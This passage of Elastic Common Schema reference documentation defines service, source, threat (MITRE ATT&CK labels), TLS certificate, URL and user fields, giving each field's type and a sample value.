["kibana_admin", "reporting_user"] + +-- + +[float] +=== service + +The service fields describe the service for or from which the data was collected. +These fields help you find and correlate logs for a specific service and version. + + +*`service.ephemeral_id`*:: ++ +-- +Ephemeral identifier of this service (if one exists). +This id normally changes across restarts, but `service.id` does not. + +type: keyword + +example: 8a4f500f + +-- + +*`service.id`*:: ++ +-- +Unique identifier of the running service. If the service is comprised of many nodes, the `service.id` should be the same for all nodes. +This id should uniquely identify the service. This makes it possible to correlate logs and metrics for one specific service, no matter which particular node emitted the event. +Note that if you need to see the events from one specific host of the service, you should filter on that `host.name` or `host.id` instead. + +type: keyword + +example: d37e5ebfe0ae6c4972dbe9f0174a1637bb8247f6 + +-- + +*`service.name`*:: ++ +-- +Name of the service data is collected from. +The name of the service is normally user given. This allows for distributed services that run on multiple hosts to correlate the related instances based on the name. +In the case of Elasticsearch the `service.name` could contain the cluster name. For Beats the `service.name` is by default a copy of the `service.type` field if no name is specified. + +type: keyword + +example: elasticsearch-metrics + +-- + +*`service.node.name`*:: ++ +-- +Name of a service node. +This allows for two nodes of the same service running on the same host to be differentiated. Therefore, `service.node.name` should typically be unique across nodes of a given service. +In the case of Elasticsearch, the `service.node.name` could contain the unique node name within the Elasticsearch cluster. In cases where the service doesn't have the concept of a node name, the host name or container name can be used to distinguish running instances that make up this service. If those do not provide uniqueness (e.g. multiple instances of the service running on the same host) - the node name can be manually set. + +type: keyword + +example: instance-0000000016 + +-- + +*`service.state`*:: ++ +-- +Current state of the service. + +type: keyword + +-- + +*`service.type`*:: ++ +-- +The type of the service data is collected from. +The type can be used to group and correlate logs and metrics from one service type. +Example: If logs or metrics are collected from Elasticsearch, `service.type` would be `elasticsearch`. + +type: keyword + +example: elasticsearch + +-- + +*`service.version`*:: ++ +-- +Version of the service the data was collected from. +This allows to look at a data set only for a specific version of a service. + +type: keyword + +example: 3.2.4 + +-- + +[float] +=== source + +Source fields capture details about the sender of a network exchange/packet. These fields are populated from a network event, packet, or other event containing details of a network transaction. +Source fields are usually populated in conjunction with destination fields. The source and destination fields are considered the baseline and should always be filled if an event contains source and destination details from a network transaction. If the event also contains identification of the client and server roles, then the client and server fields should also be populated. + + +*`source.address`*:: ++ +-- +Some event source addresses are defined ambiguously. The event will sometimes list an IP, a domain or a unix socket. You should always store the raw address in the `.address` field. +Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. + +type: keyword + +-- + +*`source.as.number`*:: ++ +-- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + +type: long + +example: 15169 + +-- + +*`source.as.organization.name`*:: ++ +-- +Organization name. + +type: keyword + +example: Google LLC + +-- + +*`source.as.organization.name.text`*:: ++ +-- +type: text + +-- + +*`source.bytes`*:: ++ +-- +Bytes sent from the source to the destination. + +type: long + +example: 184 + +format: bytes + +-- + +*`source.domain`*:: ++ +-- +Source domain. + +type: keyword + +-- + +*`source.geo.city_name`*:: ++ +-- +City name. + +type: keyword + +example: Montreal + +-- + +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + +*`source.geo.continent_name`*:: ++ +-- +Name of the continent. + +type: keyword + +example: North America + +-- + +*`source.geo.country_iso_code`*:: ++ +-- +Country ISO code. + +type: keyword + +example: CA + +-- + +*`source.geo.country_name`*:: ++ +-- +Country name. + +type: keyword + +example: Canada + +-- + +*`source.geo.location`*:: ++ +-- +Longitude and latitude. + +type: geo_point + +example: { "lon": -73.614830, "lat": 45.505918 } + +-- + +*`source.geo.name`*:: ++ +-- +User-defined description of a location, at the level of granularity they care about. +Could be the name of their data centers, the floor number, if this describes a local physical entity, city names. +Not typically used in automated geolocation. + +type: keyword + +example: boston-dc + +-- + +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + +*`source.geo.region_iso_code`*:: ++ +-- +Region ISO code. + +type: keyword + +example: CA-QC + +-- + +*`source.geo.region_name`*:: ++ +-- +Region name. + +type: keyword + +example: Quebec + +-- + +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + +*`source.ip`*:: ++ +-- +IP address of the source (IPv4 or IPv6). + +type: ip + +-- + +*`source.mac`*:: ++ +-- +MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. + +type: keyword + +example: 00-00-5E-00-53-23 + +-- + +*`source.nat.ip`*:: ++ +-- +Translated ip of source based NAT sessions (e.g. internal client to internet) +Typically connections traversing load balancers, firewalls, or routers. + +type: ip + +-- + +*`source.nat.port`*:: ++ +-- +Translated port of source based NAT sessions. (e.g. internal client to internet) +Typically used with load balancers, firewalls, or routers. + +type: long + +format: string + +-- + +*`source.packets`*:: ++ +-- +Packets sent from the source to the destination. + +type: long + +example: 12 + +-- + +*`source.port`*:: ++ +-- +Port of the source. + +type: long + +format: string + +-- + +*`source.registered_domain`*:: ++ +-- +The highest registered source domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`source.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`source.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`source.user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`source.user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`source.user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`source.user.full_name.text`*:: ++ +-- +type: text + +-- + +*`source.user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`source.user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`source.user.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`source.user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`source.user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`source.user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`source.user.name.text`*:: ++ +-- +type: text + +-- + +*`source.user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== threat + +Fields to classify events and alerts according to a threat taxonomy such as the MITRE ATT&CK® framework. +These fields are for users to classify alerts from all of their sources (e.g. IDS, NGFW, etc.) within a common taxonomy. The threat.tactic.* are meant to capture the high level category of the threat (e.g. "impact"). The threat.technique.* fields are meant to capture which kind of approach is used by this detected threat, to accomplish the goal (e.g. "endpoint denial of service"). + + +*`threat.framework`*:: ++ +-- +Name of the threat framework used to further categorize and classify the tactic and technique of the reported threat. Framework classification can be provided by detecting systems, evaluated at ingest time, or retrospectively tagged to events. + +type: keyword + +example: MITRE ATT&CK + +-- + +*`threat.tactic.id`*:: ++ +-- +The id of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) + +type: keyword + +example: TA0002 + +-- + +*`threat.tactic.name`*:: ++ +-- +Name of the type of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/) + +type: keyword + +example: Execution + +-- + +*`threat.tactic.reference`*:: ++ +-- +The reference url of tactic used by this threat. You can use a MITRE ATT&CK® tactic, for example. (ex. https://attack.mitre.org/tactics/TA0002/ ) + +type: keyword + +example: https://attack.mitre.org/tactics/TA0002/ + +-- + +*`threat.technique.id`*:: ++ +-- +The id of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) + +type: keyword + +example: T1059 + +-- + +*`threat.technique.name`*:: ++ +-- +The name of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) + +type: keyword + +example: Command and Scripting Interpreter + +-- + +*`threat.technique.name.text`*:: ++ +-- +type: text + +-- + +*`threat.technique.reference`*:: ++ +-- +The reference url of technique used by this threat. You can use a MITRE ATT&CK® technique, for example. (ex. https://attack.mitre.org/techniques/T1059/) + +type: keyword + +example: https://attack.mitre.org/techniques/T1059/ + +-- + +*`threat.technique.subtechnique.id`*:: ++ +-- +The full id of subtechnique used by this threat. You can use a MITRE ATT&CK® subtechnique, for example. (ex. https://attack.mitre.org/techniques/T1059/001/) + +type: keyword + +example: T1059.001 + +-- + +*`threat.technique.subtechnique.name`*:: ++ +-- +The name of subtechnique used by this threat. You can use a MITRE ATT&CK® subtechnique, for example. (ex. https://attack.mitre.org/techniques/T1059/001/) + +type: keyword + +example: PowerShell + +-- + +*`threat.technique.subtechnique.name.text`*:: ++ +-- +type: text + +-- + +*`threat.technique.subtechnique.reference`*:: ++ +-- +The reference url of subtechnique used by this threat. You can use a MITRE ATT&CK® subtechnique, for example. (ex. https://attack.mitre.org/techniques/T1059/001/) + +type: keyword + +example: https://attack.mitre.org/techniques/T1059/001/ + +-- + +[float] +=== tls + +Fields related to a TLS connection. These fields focus on the TLS protocol itself and intentionally avoids in-depth analysis of the related x.509 certificate files. + + +*`tls.cipher`*:: ++ +-- +String indicating the cipher used during the current connection. + +type: keyword + +example: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 + +-- + +*`tls.client.certificate`*:: ++ +-- +PEM-encoded stand-alone certificate offered by the client. This is usually mutually-exclusive of `client.certificate_chain` since this value also exists in that list. + +type: keyword + +example: MII... + +-- + +*`tls.client.certificate_chain`*:: ++ +-- +Array of PEM-encoded certificates that make up the certificate chain offered by the client. This is usually mutually-exclusive of `client.certificate` since that value should be the first certificate in the chain. + +type: keyword + +example: ["MII...", "MII..."] + +-- + +*`tls.client.hash.md5`*:: ++ +-- +Certificate fingerprint using the MD5 digest of DER-encoded version of certificate offered by the client. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0F76C7F2C55BFD7D8E8B8F4BFBF0C9EC + +-- + +*`tls.client.hash.sha1`*:: ++ +-- +Certificate fingerprint using the SHA1 digest of DER-encoded version of certificate offered by the client. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 9E393D93138888D288266C2D915214D1D1CCEB2A + +-- + +*`tls.client.hash.sha256`*:: ++ +-- +Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the client. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0687F666A054EF17A08E2F2162EAB4CBC0D265E1D7875BE74BF3C712CA92DAF0 + +-- + +*`tls.client.issuer`*:: ++ +-- +Distinguished name of subject of the issuer of the x.509 certificate presented by the client. + +type: keyword + +example: CN=Example Root CA, OU=Infrastructure Team, DC=example, DC=com + +-- + +*`tls.client.ja3`*:: ++ +-- +A hash that identifies clients based on how they perform an SSL/TLS handshake. + +type: keyword + +example: d4e5b18d6b55c71272893221c96ba240 + +-- + +*`tls.client.not_after`*:: ++ +-- +Date/Time indicating when client certificate is no longer considered valid. + +type: date + +example: 2021-01-01T00:00:00.000Z + +-- + +*`tls.client.not_before`*:: ++ +-- +Date/Time indicating when client certificate is first considered valid. + +type: date + +example: 1970-01-01T00:00:00.000Z + +-- + +*`tls.client.server_name`*:: ++ +-- +Also called an SNI, this tells the server which hostname to which the client is attempting to connect to. When this value is available, it should get copied to `destination.domain`. + +type: keyword + +example: www.elastic.co + +-- + +*`tls.client.subject`*:: ++ +-- +Distinguished name of subject of the x.509 certificate presented by the client. + +type: keyword + +example: CN=myclient, OU=Documentation Team, DC=example, DC=com + +-- + +*`tls.client.supported_ciphers`*:: ++ +-- +Array of ciphers offered by the client during the client hello. + +type: keyword + +example: ["TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384", "..."] + +-- + +*`tls.client.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`tls.client.x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`tls.client.x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`tls.client.x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`tls.client.x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`tls.client.x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`tls.client.x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`tls.client.x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.client.x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`tls.client.x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`tls.client.x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`tls.client.x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`tls.client.x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`tls.client.x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`tls.client.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`tls.client.x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`tls.client.x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`tls.client.x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`tls.client.x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`tls.client.x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`tls.client.x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`tls.client.x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`tls.client.x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.client.x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +*`tls.curve`*:: ++ +-- +String indicating the curve used for the given cipher, when applicable. + +type: keyword + +example: secp256r1 + +-- + +*`tls.established`*:: ++ +-- +Boolean flag indicating if the TLS negotiation was successful and transitioned to an encrypted tunnel. + +type: boolean + +-- + +*`tls.next_protocol`*:: ++ +-- +String indicating the protocol being tunneled. Per the values in the IANA registry (https://www.iana.org/assignments/tls-extensiontype-values/tls-extensiontype-values.xhtml#alpn-protocol-ids), this string should be lower case. + +type: keyword + +example: http/1.1 + +-- + +*`tls.resumed`*:: ++ +-- +Boolean flag indicating if this TLS connection was resumed from an existing TLS negotiation. + +type: boolean + +-- + +*`tls.server.certificate`*:: ++ +-- +PEM-encoded stand-alone certificate offered by the server. This is usually mutually-exclusive of `server.certificate_chain` since this value also exists in that list. + +type: keyword + +example: MII... + +-- + +*`tls.server.certificate_chain`*:: ++ +-- +Array of PEM-encoded certificates that make up the certificate chain offered by the server. This is usually mutually-exclusive of `server.certificate` since that value should be the first certificate in the chain. + +type: keyword + +example: ["MII...", "MII..."] + +-- + +*`tls.server.hash.md5`*:: ++ +-- +Certificate fingerprint using the MD5 digest of DER-encoded version of certificate offered by the server. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0F76C7F2C55BFD7D8E8B8F4BFBF0C9EC + +-- + +*`tls.server.hash.sha1`*:: ++ +-- +Certificate fingerprint using the SHA1 digest of DER-encoded version of certificate offered by the server. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 9E393D93138888D288266C2D915214D1D1CCEB2A + +-- + +*`tls.server.hash.sha256`*:: ++ +-- +Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the server. For consistency with other hash values, this value should be formatted as an uppercase hash. + +type: keyword + +example: 0687F666A054EF17A08E2F2162EAB4CBC0D265E1D7875BE74BF3C712CA92DAF0 + +-- + +*`tls.server.issuer`*:: ++ +-- +Subject of the issuer of the x.509 certificate presented by the server. + +type: keyword + +example: CN=Example Root CA, OU=Infrastructure Team, DC=example, DC=com + +-- + +*`tls.server.ja3s`*:: ++ +-- +A hash that identifies servers based on how they perform an SSL/TLS handshake. + +type: keyword + +example: 394441ab65754e2207b1e1b457b3641d + +-- + +*`tls.server.not_after`*:: ++ +-- +Timestamp indicating when server certificate is no longer considered valid. + +type: date + +example: 2021-01-01T00:00:00.000Z + +-- + +*`tls.server.not_before`*:: ++ +-- +Timestamp indicating when server certificate is first considered valid. + +type: date + +example: 1970-01-01T00:00:00.000Z + +-- + +*`tls.server.subject`*:: ++ +-- +Subject of the x.509 certificate presented by the server. + +type: keyword + +example: CN=www.example.com, OU=Infrastructure Team, DC=example, DC=com + +-- + +*`tls.server.x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`tls.server.x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`tls.server.x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`tls.server.x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`tls.server.x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`tls.server.x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`tls.server.x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`tls.server.x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.server.x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`tls.server.x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`tls.server.x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`tls.server.x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`tls.server.x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`tls.server.x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`tls.server.x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`tls.server.x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`tls.server.x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`tls.server.x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`tls.server.x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`tls.server.x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`tls.server.x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`tls.server.x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`tls.server.x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`tls.server.x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +*`tls.version`*:: ++ +-- +Numeric part of the version parsed from the original string. + +type: keyword + +example: 1.2 + +-- + +*`tls.version_protocol`*:: ++ +-- +Normalized lowercase protocol name parsed from original string. + +type: keyword + +example: tls + +-- + +*`span.id`*:: ++ +-- +Unique identifier of the span within the scope of its trace. +A span represents an operation within a transaction, such as a request to another service, or a database query. + +type: keyword + +example: 3ff9a8981b7ccd5a + +-- + +*`trace.id`*:: ++ +-- +Unique identifier of the trace. +A trace groups multiple events like transactions that belong together. For example, a user request handled by multiple inter-connected services. + +type: keyword + +example: 4bf92f3577b34da6a3ce929d0e0e4736 + +-- + +*`transaction.id`*:: ++ +-- +Unique identifier of the transaction within the scope of its trace. +A transaction is the highest level of work measured within a service, such as a request to a server. + +type: keyword + +example: 00f067aa0ba902b7 + +-- + +[float] +=== url + +URL fields provide support for complete or partial URLs, and supports the breaking down into scheme, domain, path, and so on. + + +*`url.domain`*:: ++ +-- +Domain of the url, such as "www.elastic.co". +In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. + +type: keyword + +example: www.elastic.co + +-- + +*`url.extension`*:: ++ +-- +The field contains the file extension from the original request url, excluding the leading dot. +The file extension is only set if it exists, as not every url has a file extension. +The leading period must not be included. For example, the value must be "png", not ".png". +Note that when the file name has multiple extensions (example.tar.gz), only the last one should be captured ("gz", not "tar.gz"). + +type: keyword + +example: png + +-- + +*`url.fragment`*:: ++ +-- +Portion of the url after the `#`, such as "top". +The `#` is not part of the fragment. + +type: keyword + +-- + +*`url.full`*:: ++ +-- +If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. + +type: keyword + +example: https://www.elastic.co:443/search?q=elasticsearch#top + +-- + +*`url.full.text`*:: ++ +-- +type: text + +-- + +*`url.original`*:: ++ +-- +Unmodified original url as seen in the event source. +Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. +This field is meant to represent the URL as it was observed, complete or not. + +type: keyword + +example: https://www.elastic.co:443/search?q=elasticsearch#top or /search?q=elasticsearch + +-- + +*`url.original.text`*:: ++ +-- +type: text + +-- + +*`url.password`*:: ++ +-- +Password of the request. + +type: keyword + +-- + +*`url.path`*:: ++ +-- +Path of the request, such as "/search". + +type: keyword + +-- + +*`url.port`*:: ++ +-- +Port of the request, such as 443. + +type: long + +example: 443 + +format: string + +-- + +*`url.query`*:: ++ +-- +The query field describes the query string of the request, such as "q=elasticsearch". +The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. + +type: keyword + +-- + +*`url.registered_domain`*:: ++ +-- +The highest registered url domain, stripped of the subdomain. +For example, the registered domain for "foo.example.com" is "example.com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". + +type: keyword + +example: example.com + +-- + +*`url.scheme`*:: ++ +-- +Scheme of the request, such as "https". +Note: The `:` is not part of the scheme. + +type: keyword + +example: https + +-- + +*`url.subdomain`*:: ++ +-- +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. +For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. + +type: keyword + +example: east + +-- + +*`url.top_level_domain`*:: ++ +-- +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". +This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". + +type: keyword + +example: co.uk + +-- + +*`url.username`*:: ++ +-- +Username of the request. + +type: keyword + +-- + +[float] +=== user + +The user fields describe information about the user that is relevant to the event. +Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. + + +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +*`user.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +*`user.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.group.name`*:: ++ +-- +Name of the 